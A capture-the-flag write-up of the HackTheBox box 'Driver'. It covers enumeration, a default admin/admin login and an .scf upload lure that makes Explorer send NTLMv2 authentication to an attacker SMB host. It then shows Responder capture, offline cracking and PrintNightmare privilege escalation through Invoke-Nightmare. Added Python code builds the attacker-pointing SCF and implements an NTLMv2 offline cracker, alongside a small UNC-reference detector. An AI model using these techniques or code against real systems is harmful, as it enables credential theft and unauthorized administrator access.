┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.106
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|Phone (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (87%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-17T07:26:10
|_ start_date: 2024-01-17T07:24:34
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.106
All 1000 scanned ports on 10.10.11.106 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.106
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2024-01-17T07:34:50
|_ start_date: 2024-01-17T07:24:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 598.61 seconds
Enumeration: SMB Port 445/tcp
Without creds, I can’t connect to the shares, or even list them:
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.106 -U ""
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.106
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Enumeration: HTTP Port 80/tcp
Visiting the page returns a request for basic authentication. Firefox isn’t showing me the additional context like nmap did, but looking in Burp at the response it’s there:
When a server wants the browser to include auth, it returns this 401, and the WWW-Authenticate header says what kind of auth (in this case “Basic”) as well as a realm, which the Mozilla docs describe as:
The realm here also hands over a username: it asks for the password for admin. Guessing admin / admin at http://10.10.11.106/ works, and http://10.10.11.106/index.php loads. The site describes itself as:
“We as a part of centre of excellence, conducts various tests on multi functional printers such as testing firmware updates, drivers etc.”
with a contact address of support@driver.htb. The Firmware Updates page, http://10.10.11.106/fw_up.php, has an upload form and says:
“Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.”
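To make the exchange above concrete, here is an added Python example (mine, not code from the post or from any tool) that parses the WWW-Authenticate value nmap reported and builds the Authorization header a browser sends back once admin / admin is typed in. Its only input is the header value from the scan; it needs no network access, and the decode function is there to show that Basic auth is base64, not encryption, so the credentials are visible to anything on the path.

```python
import base64
import re


def parse_www_authenticate(header: str):
    """Split a WWW-Authenticate value into (scheme, params).

    Handles RFC-style quoted values (realm="x") as well as the unquoted,
    space-containing realm this server sends."""
    scheme, _, params = header.strip().partition(" ")
    out = {}
    for m in re.finditer(r'(\w+)\s*=\s*(?:"([^"]*)"|([^,]*))', params):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        out[m.group(1).lower()] = value.strip()
    return scheme, out


def basic_authorization(user: str, password: str) -> str:
    """Build the Authorization header a browser sends back for Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def recover_basic_credentials(authorization: str):
    """Decode an 'Authorization: Basic ...' header back to (user, password).

    Base64 is an encoding, not encryption: anyone who can read the request
    (no TLS on port 80 here) has the cleartext credentials."""
    scheme, _, token = authorization.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


# The header value nmap's http-auth script reported for this host (taken from the scan above)
CHALLENGE = "Basic realm=MFP Firmware Update Center. Please enter password for admin"

if __name__ == "__main__":
    scheme, params = parse_www_authenticate(CHALLENGE)
    print(scheme, "realm =", params["realm"])
    hdr = basic_authorization("admin", "admin")
    print(hdr, "->", recover_basic_credentials(hdr))
```

The parser is deliberately lenient about the unquoted realm: the RFC wants a quoted-string, but IIS/PHP will happily emit whatever the application put in the header, and the scan shows exactly that.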
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.106
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.3.25.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ / - Requires Authentication for realm 'MFP Firmware Update Center. Please enter password for admin'
+ /: Default account found for 'MFP Firmware Update Center. Please enter password for admin' at (ID 'admin', PW 'admin'). Generic account discovered.. See: CWE-16
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8100 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-01-16 21:20:50 (GMT-5) (3071 seconds)
Shell as tony
Capture Net-NTLMv2:
The page says that what I upload will go to their file share. That implies it isn’t necessarily going to the webserver, so looking for a way to upload a webshell doesn’t make much sense.
A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened in File Explorer, Explorer will connect back to fetch that icon, and in doing so will offer Net-NTLMv2 authentication. If I control that host, I can capture that exchange and try to crack the Net-NTLMv2 response with an offline bruteforce (like hashcat). I used this technique on the Insane machine Sizzle back in 2019.
SCF files are Windows Shell Command files, and there are far more references on how to make a malicious one than on legitimate uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop shortcut and a View Channels Quick Launch shortcut using SCF files. The format is:
[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>
Capture Hash:
I’ll abuse the IconFile field by having it point to my server over SMB, and create exodus.scf:
I’ll start responder, which will start many different kinds of servers (including SMB) to listen and try to get Net-NTLMv2 challenges.
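As an added example that is not the author’s exodus.scf (the page does not reproduce that file) and not any tool’s code: a Python helper that writes an SCF with its IconFile pointed at a UNC path, plus the inverse check a defender could run over files landing on an upload share. The attacker address 10.10.14.99 and the share and icon names are placeholders, not the ones used on the box.

```python
import re

# Layout of the Show Desktop SCF from the old Microsoft page, with IconFile swapped
# for a UNC path. Explorer resolves IconFile to draw the icon as soon as the folder
# is viewed, so the SMB connection (and the NTLM authentication) happens with no click.
SCF_TEMPLATE = (
    "[Shell]\r\n"
    "Command=2\r\n"
    "IconFile={icon}\r\n"
    "[Taskbar]\r\n"
    "Command=ToggleDesktop\r\n"
)

ATTACKER_HOST = "10.10.14.99"  # placeholder: the page does not give the author's tun0 address


def build_scf(host: str = ATTACKER_HOST, share: str = "share", icon: str = "icon.ico") -> str:
    """Return the text of an .scf whose icon lives on an attacker-controlled SMB share."""
    unc = "\\\\" + host + "\\" + share + "\\" + icon
    return SCF_TEMPLATE.format(icon=unc)


# Defender side: any IconFile (or Command) value that starts with \\ makes Explorer
# reach out to that host. Flagging such values on an upload share is cheap.
_UNC_VALUE = re.compile(r"^\s*(?:IconFile|Command)\s*=\s*(\\\\[^\s\\]+\\.+?)\s*$", re.I | re.M)


def unc_references(scf_text: str) -> list:
    """List the UNC paths an SCF would make Explorer connect to (empty means local icon only)."""
    return [m.group(1) for m in _UNC_VALUE.finditer(scf_text)]


def write_scf(path: str, host: str = ATTACKER_HOST) -> None:
    # Keep the CRLF line endings: open in binary so Python does not translate them.
    with open(path, "wb") as fh:
        fh.write(build_scf(host).encode())


if __name__ == "__main__":
    write_scf("exodus.scf")
    print(unc_references(build_scf()))
```

The same check applies to .url and .lnk files, which can also carry a remote icon location; the regex here only knows the two SCF keys.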
┌──(kali💀kali)-[~/Desktop]
└─$ sudo responder -I tun0
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
I’ll upload the .scf file to Driver, and very quickly there’s a hit at responder:
┌──(kali💀kali)-[~/Desktop]
└─$ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2024-01-17 08:15) 25.00g/s 844800p/s 844800c/s 844800C/s !!!!!!..redlips
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
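What john is actually doing with that line, as an added Python example (mine, not the post’s code and not what Responder or john use internally): the Responder line is user::domain:serverchallenge:NTProofStr:blob, and NTProofStr is HMAC-MD5 keyed by a value derived from the NT hash, so each guess costs one MD4 and two HMAC-MD5s with nothing secret on the attacker’s side. The real capture is not reproduced on the page, so the sample line below is constructed offline from an arbitrary challenge and blob and the password the crack recovered. MD4 is implemented inline because hashlib’s md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import struct


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). MD4 over UTF-16LE(password) is exactly the NT hash."""
    mask = 0xFFFFFFFF
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    padded = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(padded), 64):
        X = struct.unpack("<16I", padded[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[j] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate so the next step updates the next word
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); the domain keeps its case
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    # NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || client blob)
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str):
    # Responder / hashcat -m 5600 format: user::domain:serverchallenge:NTProofStr:blob
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    """True if this password reproduces the NTProofStr in the captured line."""
    user, domain, chal, proof, blob = parse_responder_line(line)
    return hmac.compare_digest(nt_proof(password, user, domain, chal, blob), proof)


def crack(line: str, wordlist):
    """Offline dictionary attack: the first candidate that verifies, or None."""
    for pw in wordlist:
        if check_candidate(line, pw):
            return pw
    return None


def make_capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    # Builds what Responder would print; used here only to construct a sample offline
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample (the real capture is not on the page). The challenge and blob are
# arbitrary bytes shaped like NTLMv2 fields: blob header 0101..., zero timestamp, client nonce.
_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + b"\x11" * 8 + b"\x00" * 4 + b"\x00" * 4
SAMPLE_LINE = make_capture_line("tony", "DRIVER", "liltony", _CHALLENGE, _BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["password", "123456", "liltony"]))
```

Two things this makes obvious: the server challenge is chosen by the attacker’s SMB server, so nothing stops an attacker from capturing as many of these as users will browse to the share, and the work per guess is tiny, which is why rockyou falls in well under a second even in john on CPU.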
Crackmapexec:
crackmapexec is a nice way to show that the creds work:
WinRM:
I’ll use Evil-WinRM to connect to WinRM (installed with sudo gem install evil-winrm):
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony
And grab user.txt:
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
d6df5511a----------------------------------
Shell as administrator - PrintNightmare
Background:
This box was developed as part of the Intro to Printer Exploitation track on HackTheBox. Just as it was in development, PrintNightmare exploded onto the scene (I did a post about it here). Driver was left vulnerable to PrintNightmare as well.
Import Exploit:
The Invoke-Nightmare PowerShell script can be run from a low-privilege shell to add an admin user to the box. I’ll download the exploit with git (and rename the directory to something I’ll recognize):
Now I can upload the exploit over my WinRM session:
*Evil-WinRM* PS C:\Users\tony\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/invoke-nightmare/CVE-2021-1675.ps1
However, trying to import the module is blocked by execution policy. The simplest way around that is to read the script from my host over HTTP and pipe the text into iex (Invoke-Expression): execution policy only governs script files on disk, not text handed to Invoke-Expression. I’ll start a Python web server on my host in the directory where the PS1 script is with python3 -m http.server 80, and then request the file:
-UseBasicParsing lets the request succeed even if the Internet Explorer engine isn’t available. Now the cmdlet is in my current PowerShell session:
*Evil-WinRM* PS C:\programdata> Get-Command Invoke-Nightmare
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-Nightmare
Shell:
By default, Invoke-Nightmare adds a user adm1n with the password “P@ssw0rd”. I’ll use arguments to add my own user and password:
*Evil-WinRM* PS C:\programdata> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
The output shows it writing a DLL as the payload and then loading that DLL as a printer driver through the Print Spooler, which runs as SYSTEM. The DLL just adds a user to the system as a local administrator. Then the script deletes the DLL. Not only is 0xdf now a user on the box, it’s also in the Administrators group:
*Evil-WinRM* PS C:\programdata> net user 0xdf
User name 0xdf
Full Name 0xdf
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/17/2024 1:27:35 PM
Password expires Never
Password changeable 1/17/2024 1:27:35 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
WinRM:
Connecting as the new user gives me access to the full filesystem:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u 0xdf -p 0xdf0xdf
*Evil-WinRM* PS C:\Users\0xdf\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
68bb8ed---------------------------